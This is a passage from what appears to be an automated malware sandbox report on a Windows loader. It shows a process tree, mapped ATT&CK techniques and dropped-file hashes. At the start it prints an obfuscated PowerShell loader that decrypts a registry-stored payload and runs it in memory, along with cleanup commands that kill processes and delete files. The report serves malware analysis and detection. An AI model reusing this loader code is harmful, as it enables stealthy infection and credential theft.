'')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
        5⤵
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1340
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C cd %systemdrive%\Windows\ & taskkill /F /IM $sxr-powershell.exe & taskkill /F /IM $sxr-nircmd.exe & taskkill /F /IM $sxr-Uni.bat.exe & taskkill /F /IM explorer.exe & ping 127.0.0.1 -n 2 > nul & start explorer.exe & PING localhost -n 8 >NUL & ATTRIB -h -s C:\Windows\$sxr-powershell.exe & ATTRIB -h -s %systemdrive%\Windows\$sxr-seroxen1\$sxr-Uni.bat & del /f C:\Windows\$sxr-powershell.exe & del /f %systemdrive%\Windows\$sxr-seroxen1\$sxr-nircmd.exe & del /f %systemdrive%\Windows\$sxr-seroxen1\$sxr-Uni.bat & rmdir /Q /s %systemdrive%\Windows\$sxr-seroxen1 & rmdir /Q /s "\\?\C:\Windows " & exit
        5⤵
        Drops file in Windows directory
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4964
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5316
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM $sxr-powershell.exe
        6⤵
        Kills process with taskkill
        
        PID:2232
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM $sxr-nircmd.exe
        6⤵
        Kills process with taskkill
        
        PID:2984
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM $sxr-Uni.bat.exe
        6⤵
        Kills process with taskkill
        
        PID:2036
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM explorer.exe
        6⤵
        Kills process with taskkill
        
        PID:716
      - C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 2
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6072
      - C:\Windows\explorer.exe
        
        explorer.exe
        6⤵
        Boot or Logon Autostart Execution: Active Setup
        Enumerates connected drives
        Checks SCSI registry key(s)
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3160
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3160 -s 5496
        7⤵
        
        PID:5632
      - C:\Windows\system32\PING.EXE
        
        PING localhost -n 8
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2216
      - C:\Windows\system32\attrib.exe
        
        ATTRIB -h -s C:\Windows\$sxr-powershell.exe
        6⤵
        Drops file in Windows directory
        Views/modifies file attributes
        
        PID:5752
      - C:\Windows\system32\attrib.exe
        
        ATTRIB -h -s C:\Windows\$sxr-seroxen1\$sxr-Uni.bat
        6⤵
        Drops file in Windows directory
        Views/modifies file attributes
        
        PID:5832
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:5752
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5720
    - - C:\Windows\system32\PING.EXE
        
        PING localhost -n 8
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5728
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
        5⤵
        Kills process with taskkill
        
        PID:5292
    - - C:\Windows\system32\attrib.exe
        
        ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
        5⤵
        Views/modifies file attributes
        
        PID:5632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3820

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4172

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4368

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1660

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3768

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3152

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3100

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:2240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4592

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 36db7855cbccf2dac8db2cfcc96fbde8 oo1rny+JK0qbXVCi2Jc2GQ.0.1.0.0.0
1⤵
PID:1852
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4044

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:2732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:1584

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:1788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:224

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:888

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5376

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5272

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4500

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2052

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:1668

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:1348

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3172

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:4240

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:2840

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4952

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:1536

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:2176

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4684

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:5476

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4384

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:2112

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:4232

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:1852

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:3544

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3732

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:464

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:6056

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4836

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3348

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:4168

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:6072

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
328B

MD5
23e34c2bfe7d76e35994d2104fad309e

SHA1
abadab27462f328493a88d3f2bc90d8770652110

SHA256
346c5d22f8e3a083df1d8b9e21821cf58613228d8b7dfb26013202017635f72d

SHA512
80b4a0164b502d568875711fb05de0abf263ada56c46acf1b4d4584d3aa65d478f1077dfecf87864eab53f97b97ef154603b3348446c9f8d1b3fa5f948046517

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.bin

Filesize
414KB

MD5
ab79489e9704fc9cc9d8bee4f8e17ec5

SHA1
b2e19a89b43d537bb5b02ee9ca2418f027259c1e

SHA256
4d71760d6f3159849068b635ab4c39b9b747d899f03670533971a62d262c264e

SHA512
60d11ee023b9a045c4b59b88311f001fcf4856e27837a1ffd6ecab0203e5199ee077d85c5217e0f0b94e0bff93b14c3680816b6fbf9d42ee2eff5c23d9a13edd

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\SPEMGLWA\microsoft.windows[1].xml

Filesize
96B

MD5
981b6e891674d906874cdc21d1721367

SHA1
808933593c0ce3813bc22e972ca04e4e21177648

SHA256
0ef58a35ea0209dc424f1d8fbd2118b05c37da5b70cf006c5ad04899c1ffbc7d

SHA512
db0901f67dd4b2f8d1bd0ee0d109918312eb705163938e3e4427e9ad4fdf400343ed684eb661febd13d65e81de7464a17a3772958b14f706666e30f6691585ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe

Filesize
445KB

MD5
2e5a8590cf6848968fc23de3fa1e25f1

SHA1
801262e122db6a2e758962896f260b55bbd0136a

SHA256
9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3

SHA512
5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w00t1zql.ohl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-seroxen1\$sxr-nircmd.exe

Filesize
116KB

MD5
5ed4728caa339c2a7479102f0c04c087

SHA1
20cd453fcac9d9960b0076715d985a55784a6b53

SHA256
7160db2b7a6680480e64f0845512d203a575f807831faf9a652aaef0988f876c

SHA512
a521eac0d54fbfb9726fad3fafcd7779d455ca46e065a3eafc1a7883961b061550bab8e93ce576904b6c6b2d25cf129ff3d2437ed26a6033ac7c0b4c628dc865

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
3KB

MD5
4838ee953dab2c7a1bf57e0c6620a79d

SHA1
8c39cd200f9ffa77739ff686036d0449984f1323

SHA256
22c798e00c4793749eac39cfb6ea3dd75112fd4453a3706e839038a64504d45d

SHA512
066782b16e6e580e2861013c530d22d62c5ba0f217428cc0228ad45b855e979a86d2d04f553f3751cf7d063c6863cb7ea9c86807e7f89c7e0ae12481af65af76

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
3KB

MD5
8e64ab95d5d2c4c1e7a757624cb1fffa

SHA1
9889f93ad60bacb07683b4a23c40aa32954646d8

SHA256
dff8902430dcae2fba05fc7f54157c4bc8a7445ed488c1d5727947a0c07075d6

SHA512
3ecc166686c1d7d61e91ec972244118980bf626a88123b87136695ac206e159933ad9f9feb3fd565713dd5d99038f427b845637c51a57497f0ac716de3a7973c

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
3KB

MD5
c6086d02f8ce044f5fa07a98303dc7eb

SHA1
6116247e9d098b276b476c9f4c434f55d469129c

SHA256
8901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0

SHA512
1876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
3KB

MD5
39b9eb9d1a56bc1792c844c425bd1dec

SHA1
db5a91082fa14eeb6550cbc994d34ebd95341df9

SHA256
acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692

SHA512
255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
a9124c4c97cba8a07a8204fac1696c8e

SHA1
1f27d80280e03762c7b16781608786f5a98ff434

SHA256
8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

SHA512
537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

Download Submit
C:\Windows\System32\vcruntime140_1d.dll

Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
C:\Windows\System32\vcruntime140d.dll

Filesize
162KB

MD5
a366d6623c14c377c682d6b5451575e6

SHA1
a8894fcfb3aa06ad073b1f581b2e749b54827971

SHA256
7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

SHA512
cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

Download Submit
memory/412-193-0x00007FFC00990000-0x00007FFC009A0000-memory.dmp

Filesize
64KB

Download
memory/412-192-0x0000026F646E0000-0x0000026F64707000-memory.dmp

Filesize
